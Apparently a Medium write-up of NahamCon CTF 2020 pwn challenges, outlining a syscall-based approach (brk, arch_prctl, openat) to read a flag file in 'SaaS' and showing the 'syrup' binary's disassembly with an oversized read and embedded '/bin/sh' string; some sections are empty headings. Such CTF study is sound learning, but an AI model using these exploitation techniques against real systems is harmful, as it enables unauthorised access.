NahamCon CTF 2020

###Dangerous

###SaaS

int brk(void *addr)
int arch_prctl(int code, unsigned long addr)
int openat(int dirfd, const char *pathname, int flags, mode_t mode)

ssize_t write(int fd, const void *buf, size_t count)
  • the brk() syscall help us allocate the heap memory, we need it to create space to write() our flag
  • the arch_prctl() let you set the FS and GS segment registers x86_64 linux systems. long story short this function gonna let us write 4 bytes to where you point to.
  • the openat() is the same as open() but it’s will return fd if you provide dirfd(which is AT_FDCWD) and relative pathname (which is the one we wrote by arch_prctl())
we need to “set” what value to write before “get” which address we want to write
#include <asm/prctl.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/types.h>
int main(){
printf("ARCH_SET_GS = 0x%x\n", ARCH_SET_GS);
printf("ARCH_GET_GS = 0x%x\n", ARCH_GET_GS);
printf("AT_FDCWD = 0x%x\n", AT_FDCWD);
return 0;
}
  • we need to brk(0) to get the heap base
  • extend the length of the heap brk(0x1000)
  • write ‘flag.txt’ to heap by using the wrapper above
  • pop openat to get the dirfd for read(), write()

###shift-ahoy

###syrup

Disassembly of section .text:0000000000401000 <fn2>:
401000: 55 push rbp
401001: 48 89 e5 mov rbp,rsp
401004: 58 pop rax
401005: 48 bf 11 20 40 00 00 movabs rdi,0x402011
40100c: 00 00 00
40100f: 0f 05 syscall
401011: 5d pop rbp
401012: c3 ret
0000000000401013 <nope>:
401013: b8 01 00 00 00 mov eax,0x1
401018: bf 01 00 00 00 mov edi,0x1
40101d: 48 be 11 20 40 00 00 movabs rsi,0x402011
401024: 00 00 00
401027: ba 07 00 00 00 mov edx,0x7
40102c: 0f 05 syscall
40102e: b8 3c 00 00 00 mov eax,0x3c
401033: bf 00 00 00 00 mov edi,0x0
401038: 0f 05 syscall
40103a: 2f (bad)
40103b: 62 (bad)
40103c: 69 .byte 0x69
40103d: 6e outs dx,BYTE PTR ds:[rsi]
40103e: 2f (bad)
40103f: 73 68 jae 4010a9 <_start+0x27>
...
0000000000401042 <fn1>:
401042: 55 push rbp
401043: 48 89 e5 mov rbp,rsp
401046: b8 ad de 00 00 mov eax,0xdead
40104b: 48 35 ef be 00 00 xor rax,0xbeef
401051: 50 push rax
401052: 48 83 ed 08 sub rbp,0x8
401056: 48 81 ed 00 04 00 00 sub rbp,0x400
40105d: b8 00 00 00 00 mov eax,0x0
401062: bf 00 00 00 00 mov edi,0x0
401067: 48 89 ee mov rsi,rbp
40106a: ba 00 08 00 00 mov edx,0x800
40106f: 0f 05 syscall
401071: 58 pop rax
401072: 48 35 ef be 00 00 xor rax,0xbeef
401078: 48 3d ad de 00 00 cmp rax,0xdead
40107e: 75 93 jne 401013 <nope>
401080: 5d pop rbp
401081: c3 ret
0000000000401082 <_start>:
401082: 55 push rbp
401083: 48 89 e5 mov rbp,rsp
401086: b8 01 00 00 00 mov eax,0x1
40108b: bf 01 00 00 00 mov edi,0x1
401090: 48 be 00 20 40 00 00 movabs rsi,0x402000
401097: 00 00 00
40109a: ba 11 00 00 00 mov edx,0x11
40109f: 0f 05 syscall
4010a1: e8 9c ff ff ff call 401042 <fn1>
4010a6: e9 68 ff ff ff jmp 401013 <nope>
  40105d: b8 00 00 00 00        mov    eax,0x0
401062: bf 00 00 00 00 mov edi,0x0
401067: 48 89 ee mov rsi,rbp
40106a: ba 00 08 00 00 mov edx,0x800
40106f: 0f 05 syscall
ssize_t read(int fd, void *buf, size_t count)
401080: 5d                    pop    rbp

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Life Hack to Reli on: new app can teach your kids to code in seconds

Authentication and Authorization Using JWT on Spring Webflux

A python class to reverse a string word by word and a python function to check if a number is…

Azure — Host A Static Website on Blob Storage

Tips & tricks that every programmer should know 9 rules that make a code ‘great’

Using Laravel AirLock with VueJS

Coding Problems and Solutions-5

Online Worker Number Remains 10 k+, Phala World Releases Stories | Phala Weekly Vol.67

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nguyễn Tín

Nguyễn Tín

a loner

More from Medium

Vulnerability Management is the Key to Stopping Attacks

Vulnerability Management

“Mr. Phisher” Walkthrough (TryHackMe) by jself970

0Day — TryHackMe

Calling the brute(force) squad